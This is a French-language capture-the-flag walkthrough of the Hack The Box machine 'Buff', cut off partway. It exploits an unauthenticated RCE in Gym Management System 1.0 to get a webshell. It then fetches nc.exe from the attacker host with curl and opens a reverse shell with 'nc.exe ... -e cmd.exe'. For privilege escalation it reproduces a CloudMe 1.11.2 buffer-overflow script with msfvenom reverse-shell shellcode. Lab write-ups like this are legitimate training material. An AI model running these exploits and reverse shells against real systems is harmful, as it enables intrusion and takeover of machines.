class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ gobuster dir -u http://buff.htb:8080/ -t <span class="m">50</span> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">Gobuster v3.6 </span></span><span class="line"><span class="cl">by OJ Reeves <span class="o">(</span>@TheColonial<span class="o">)</span> <span class="p">&amp;</span> Christian Mehlmauer <span class="o">(</span>@firefart<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Url: http://buff.htb:8080/ </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Method: GET </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Threads: <span class="m">50</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Negative Status codes: <span class="m">404</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> User Agent: gobuster/3.6 </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Timeout: <span class="nv">10s</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">Starting gobuster in directory enumeration <span class="nv">mode</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl">/profile <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 337<span class="o">]</span> <span class="o">[</span>--&gt; http://buff.htb:8080/profile/<span class="o">]</span> </span></span><span class="line"><span class="cl">/img <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 333<span class="o">]</span> <span class="o">[</span>--&gt; http://buff.htb:8080/img/<span class="o">]</span> </span></span><span class="line"><span class="cl">/upload <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 336<span class="o">]</span> <span class="o">[</span>--&gt; http://buff.htb:8080/upload/<span class="o">]</span> </span></span><span class="line"><span class="cl">/license <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 18025<span class="o">]</span> </span></span><span class="line"><span class="cl">/include <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 337<span class="o">]</span> <span class="o">[</span>--&gt; http://buff.htb:8080/include/<span class="o">]</span> </span></span><span class="line"><span class="cl">/examples <span class="o">(</span>Status: 503<span class="o">)</span> <span class="o">[</span>Size: 1054<span class="o">]</span> </span></span><span class="line"><span class="cl">/licenses <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 1199<span class="o">]</span> </span></span><span class="line"><span class="cl">/Profile <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 337<span class="o">]</span> <span class="o">[</span>--&gt; http://buff.htb:8080/Profile/<span class="o">]</span> </span></span><span class="line"><span class="cl">/LICENSE <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 18025<span class="o">]</span> </span></span><span class="line"><span class="cl">/att <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 333<span class="o">]</span> <span class="o">[</span>--&gt; http://buff.htb:8080/att/<span class="o">]</span> </span></span><span class="line"><span class="cl">/%20 <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 1040<span class="o">]</span> </span></span><span class="line"><span class="cl">/IMG <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 333<span class="o">]</span> <span class="o">[</span>--&gt; http://buff.htb:8080/IMG/<span class="o">]</span> </span></span><span class="line"><span class="cl">/License <span class="o">(</span>Status: 200<span class="o">)</span> <span class="o">[</span>Size: 18025<span class="o">]</span> </span></span><span class="line"><span class="cl">/ex <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 332<span class="o">]</span> <span class="o">[</span>--&gt; http://buff.htb:8080/ex/<span class="o">]</span> </span></span><span class="line"><span class="cl">/*checkout* <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 1040<span class="o">]</span> </span></span><span class="line"><span class="cl">/Img <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 333<span class="o">]</span> <span class="o">[</span>--&gt; http://buff.htb:8080/Img/<span class="o">]</span> </span></span><span class="line"><span class="cl">/boot <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 334<span class="o">]</span> <span class="o">[</span>--&gt; http://buff.htb:8080/boot/<span class="o">]</span> </span></span><span class="line"><span class="cl">/Upload <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 336<span class="o">]</span> <span class="o">[</span>--&gt; http://buff.htb:8080/Upload/<span class="o">]</span> </span></span><span class="line"><span class="cl">/phpmyadmin <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 1199<span class="o">]</span> </span></span><span class="line"><span class="cl">/webalizer <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 1040<span class="o">]</span> </span></span><span class="line"><span class="cl">/*docroot* <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 1040<span class="o">]</span> </span></span><span class="line"><span class="cl">/* <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 1040<span class="o">]</span> </span></span><span class="line"><span class="cl">/con <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 1040<span class="o">]</span> </span></span><span class="line"><span class="cl">/Include <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 337<span class="o">]</span> <span class="o">[</span>--&gt; http://buff.htb:8080/Include/<span class="o">]</span> </span></span><span class="line"><span class="cl">/http%3A <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 1040<span class="o">]</span> </span></span><span class="line"><span class="cl">/**http%3a <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 1040<span class="o">]</span> </span></span><span class="line"><span class="cl">/*http%3A <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 1040<span class="o">]</span> </span></span><span class="line"><span class="cl">/aux <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 1040<span class="o">]</span> </span></span><span class="line"><span class="cl">/Boot <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 334<span class="o">]</span> <span class="o">[</span>--&gt; http://buff.htb:8080/Boot/<span class="o">]</span> </span></span><span class="line"><span class="cl">/**http%3A <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 1040<span class="o">]</span> </span></span><span class="line"><span class="cl">/%C0 <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 1040<span class="o">]</span> </span></span><span class="line"><span class="cl">/server-status <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 1199<span class="o">]</span> </span></span><span class="line"><span class="cl">/%3FRID%3D2671 <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 1040<span class="o">]</span> </span></span><span class="line"><span class="cl">/devinmoore* <span class="o">(</span>Status: 403<span class="o">)</span> <span class="o">[</span>Size: 1040<span class="o">]</span> </span></span><span class="line"><span class="cl">/Ex <span class="o">(</span>Status: 301<span class="o">)</span> <span class="o">[</span>Size: 332<span class="o">]</span> <span class="o">[</span>--&gt; http://buff.htb:8080/Ex/<span class="o">]</span> </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><p>Le /ex est intéressant et indique des infos avec une erreur mysqli !</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">Warning: mysqli::__construct<span class="o">()</span>: <span class="o">(</span>HY000/1049<span class="o">)</span>: Unknown database <span class="s1">&#39;secure_login&#39;</span> in C:<span class="se">\x</span>ampp<span class="se">\h</span>tdocs<span class="se">\g</span>ym<span class="se">\e</span>x<span class="se">\i</span>nclude<span class="se">\d</span>b_connect.php on line <span class="m">3</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="gym-management-system-10---unauthenticated-rce">Gym Management System 1.0 - Unauthenticated RCE </h3><p>On recherche &ldquo;Gym&rdquo; dans searchsploit ou sur internet on trouve rapidement un exploit python permettant d&rsquo;uploader un fichier php et d&rsquo;executer n&rsquo;importe quelle commande.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ python3 exploit2.py http://buff.htb:8080/ </span></span><span class="line"><span class="cl">/home/kali/htb/Buff/exploit2.py:77: SyntaxWarning: invalid escape sequence <span class="s1">&#39;\/&#39;</span> </span></span><span class="line"><span class="cl"> <span class="nv">SIG</span> <span class="o">+=</span> BL+<span class="s1">&#39; \/&#39;</span>+RS+<span class="s1">&#39;\n&#39;</span> </span></span><span class="line"><span class="cl"> /<span class="se">\ </span></span></span><span class="line"><span class="cl">/vvvvvvvvvvvv <span class="se">\-</span>-------------------------------------, </span></span><span class="line"><span class="cl"><span class="sb">`</span>^^^^^^^^^^^^ /<span class="o">============</span><span class="nv">BOKU</span><span class="o">=====================</span><span class="s2">&#34; </span></span></span><span class="line"><span class="cl"><span class="s2"> \/ </span></span></span><span class="line"><span class="cl"><span class="s2"> </span></span></span><span class="line"><span class="cl"><span class="s2">[+] Successfully connected to webshell. </span></span></span><span class="line"><span class="cl"><span class="s2">C:\xampp\htdocs\gym\upload&gt; powershell cat ../../../../Users/shaun/Desktop/user.txt </span></span></span><span class="line"><span class="cl"><span class="s2">PNG </span></span></span><span class="line"><span class="cl"><span class="s2">▒ </span></span></span><span class="line"><span class="cl"><span class="s2">b6a5....ce0d3 </span></span></span></code></pre></td></tr></table> </div> </div><h3 id="stablize-shell">Stablize shell </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ python3 -m http.server <span class="m">8888</span> </span></span><span class="line"><span class="cl">Serving HTTP on 0.0.0.0 port <span class="m">8888</span> <span class="o">(</span>http://0.0.0.0:8888/<span class="o">)</span> ... </span></span><span class="line"><span class="cl">10.10.10.198 - - <span class="o">[</span>07/Jan/2025 17:07:08<span class="o">]</span> <span class="s2">&#34;GET /nc.exe HTTP/1.1&#34;</span> <span class="m">200</span> - </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">-------------------------------------------------------------- </span></span><span class="line"><span class="cl"><span class="c1"># RCE from website</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\x</span>ampp<span class="se">\h</span>tdocs<span class="se">\g</span>ym<span class="se">\u</span>pload&gt; curl -O http://10.10.14.42:8888/nc.exe </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\x</span>ampp<span class="se">\h</span>tdocs<span class="se">\g</span>ym<span class="se">\u</span>pload&gt; nc.exe 10.10.14.42 <span class="m">1337</span> -e cmd.exe </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">-------------------------------------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ nc -lvnp <span class="m">1337</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">1337</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.42<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.198<span class="o">]</span> <span class="m">50531</span> </span></span><span class="line"><span class="cl">Microsoft Windows <span class="o">[</span>Version 10.0.17134.1610<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">(</span>c<span class="o">)</span> <span class="m">2018</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\x</span>ampp<span class="se">\h</span>tdocs<span class="se">\g</span>ym<span class="se">\u</span>pload&gt;whoami </span></span><span class="line"><span class="cl">whoami </span></span><span class="line"><span class="cl">buff<span class="se">\s</span>haun </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\x</span>ampp<span class="se">\h</span>tdocs<span class="se">\g</span>ym<span class="se">\u</span>pload&gt;powershell </span></span><span class="line"><span class="cl">powershell </span></span><span class="line"><span class="cl">Windows PowerShell </span></span><span class="line"><span class="cl">Copyright <span class="o">(</span>C<span class="o">)</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\x</span>ampp<span class="se">\h</span>tdocs<span class="se">\g</span>ym<span class="se">\u</span>pload&gt; </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege escalation </h2><h3 id="cloudme_1112exe">CloudMe_1112.exe </h3><p>En fouillant dans les fichiers, on trouve un exectutable <code>CloudMe_1112.exe</code>. Il se trouve que cette version tourne par défaut sur le port 8888 lorsqu&rsquo;on l&rsquo;execute, ce qui est bien le cas pour notre machine</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\x</span>ampp<span class="se">\h</span>tdocs<span class="se">\g</span>ym<span class="se">\u</span>pload&gt; tasklist <span class="p">|</span> findstr Cloud </span></span><span class="line"><span class="cl">tasklist <span class="p">|</span> findstr Cloud </span></span><span class="line"><span class="cl">CloudMe.exe <span class="m">284</span> <span class="m">0</span> 18,048 K </span></span><span class="line"><span class="cl">PS C:<span class="se">\x</span>ampp<span class="se">\h</span>tdocs<span class="se">\g</span>ym<span class="se">\u</span>pload&gt; netstat -ano <span class="p">|</span> findstr LISTENING </span></span><span class="line"><span class="cl">netstat -ano <span class="p">|</span> findstr LISTENING </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:135 0.0.0.0:0 LISTENING <span class="m">944</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:445 0.0.0.0:0 LISTENING <span class="m">4</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING <span class="m">6188</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING <span class="m">7832</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING <span class="m">8820</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING <span class="m">524</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING <span class="m">1064</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING <span class="m">1644</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING <span class="m">2248</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING <span class="m">668</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING <span class="m">684</span> </span></span><span class="line"><span class="cl"> TCP 10.10.10.198:139 0.0.0.0:0 LISTENING <span class="m">4</span> </span></span><span class="line"><span class="cl"> TCP 127.0.0.1:3306 0.0.0.0:0 LISTENING <span class="m">8936</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:135 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">944</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:445 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">4</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:7680 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">7832</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:8080 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">8820</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:49664 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">524</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:49665 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">1064</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:49666 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">1644</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:49667 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">2248</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:49668 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">668</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:49669 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">684</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="cloudme-1112---buffer-overflow">CloudMe 1.11.2 - Buffer Overflow </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ searchsploit cloudme </span></span><span class="line"><span class="cl">---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- </span></span><span class="line"><span class="cl"> Exploit Title <span class="p">|</span> Path </span></span><span class="line"><span class="cl">---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">CloudMe 1.11.2 - Buffer Overflow <span class="o">(</span>PoC<span class="o">)</span> <span class="p">|</span> windows/remote/48389.py &lt;---------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">CloudMe 1.11.2 - Buffer Overflow <span class="o">(</span>SEH_DEP_ASLR<span class="o">)</span> <span class="p">|</span> windows/local/48499.txt </span></span><span class="line"><span class="cl">CloudMe 1.11.2 - Buffer Overflow ROP <span class="o">(</span>DEP_ASLR<span class="o">)</span> <span class="p">|</span> windows/local/48840.py </span></span><span class="line"><span class="cl">Cloudme 1.9 - Buffer Overflow <span class="o">(</span>DEP<span class="o">)</span> <span class="o">(</span>Metasploit<span class="o">)</span> <span class="p">|</span> windows_x86-64/remote/45197.rb </span></span><span class="line"><span class="cl">CloudMe Sync 1.10.9 - Buffer Overflow <span class="o">(</span>SEH<span class="o">)(</span>DEP Bypass<span class="o">)</span> <span class="p">|</span> windows_x86-64/local/45159.py </span></span><span class="line"><span class="cl">CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow <span class="o">(</span>Metasploit<span class="o">)</span> <span class="p">|</span> windows/remote/44175.rb </span></span><span class="line"><span class="cl">CloudMe Sync 1.11.0 - Local Buffer Overflow <span class="p">|</span> windows/local/44470.py </span></span><span class="line"><span class="cl">CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt <span class="p">|</span> windows/remote/46218.py </span></span><span class="line"><span class="cl">CloudMe Sync 1.11.2 Buffer Overflow - WoW64 <span class="o">(</span>DEP Bypass<span class="o">)</span> <span class="p">|</span> windows_x86-64/remote/46250.py </span></span><span class="line"><span class="cl">CloudMe Sync &lt; 1.11.0 - Buffer Overflow <span class="p">|</span> windows/remote/44027.py </span></span><span class="line"><span class="cl">CloudMe Sync &lt; 1.11.0 - Buffer Overflow <span class="o">(</span>SEH<span class="o">)</span> <span class="o">(</span>DEP Bypass<span class="o">)</span> <span class="p">|</span> windows_x86-64/remote/44784.py </span></span><span class="line"><span class="cl">---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- </span></span><span class="line"><span class="cl">Shellcodes: No Results </span></span></code></pre></td></tr></table> </div> </div><p>Le fichier python contient un payload généré avec msfvenom mais qui ne fonctionne pas pour notre windows 10 x64 victime. Nous avons donc généré un nouveau payload. Ensuite, on a remplacer ce code dans le python.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">msfvenom -a x86 -p windows/shell_reverse_tcp <span class="nv">LHOST</span><span class="o">=</span>10.10.14.42 <span class="nv">LPORT</span><span class="o">=</span><span class="m">9001</span> -b <span class="s1">&#39;\x00\x0A\x0D&#39;</span> -f python </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ cat exploit_cloudme.py </span></span><span class="line"><span class="cl"><span class="c1"># Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)</span> </span></span><span class="line"><span class="cl"><span class="c1"># Date: 2020-04-27</span> </span></span><span class="line"><span class="cl"><span class="c1"># Exploit Author: Andy Bowden</span> </span></span><span class="line"><span class="cl"><span class="c1"># Vendor Homepage: https://www.cloudme.com/en</span> </span></span><span class="line"><span class="cl"><span class="c1"># Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe</span> </span></span><span class="line"><span class="cl"><span class="c1"># Version: CloudMe 1.11.2</span> </span></span><span class="line"><span class="cl"><span class="c1"># Tested on: Windows 10 x86</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">#Instructions:</span> </span></span><span class="line"><span class="cl"><span class="c1"># Start the CloudMe service and run the script.</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">import socket </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">target</span> <span class="o">=</span> <span class="s2">&#34;127.0.0.1&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">padding1</span> <span class="o">=</span> b<span class="s2">&#34;\x90&#34;</span> * <span class="m">1052</span> </span></span><span class="line"><span class="cl"><span class="nv">EIP</span> <span class="o">=</span> b<span class="s2">&#34;\xB5\x42\xA8\x68&#34;</span> <span class="c1"># 0x68A842B5 -&gt; PUSH ESP, RET</span> </span></span><span class="line"><span class="cl"><span class="nv">NOPS</span> <span class="o">=</span> b<span class="s2">&#34;\x90&#34;</span> * <span class="m">30</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">=</span> b<span class="s2">&#34;&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\xbb\x9b\xa8\x51\x15\xdb\xd1\xd9\x74\x24\xf4\x5e&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x2b\xc9\xb1\x52\x31\x5e\x12\x83\xc6\x04\x03\xc5&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\xa6\xb3\xe0\x05\x5e\xb1\x0b\xf5\x9f\xd6\x82\x10&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\xae\xd6\xf1\x51\x81\xe6\x72\x37\x2e\x8c\xd7\xa3&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\xa5\xe0\xff\xc4\x0e\x4e\x26\xeb\x8f\xe3\x1a\x6a&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x0c\xfe\x4e\x4c\x2d\x31\x83\x8d\x6a\x2c\x6e\xdf&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x23\x3a\xdd\xcf\x40\x76\xde\x64\x1a\x96\x66\x99&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\xeb\x99\x47\x0c\x67\xc0\x47\xaf\xa4\x78\xce\xb7&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span 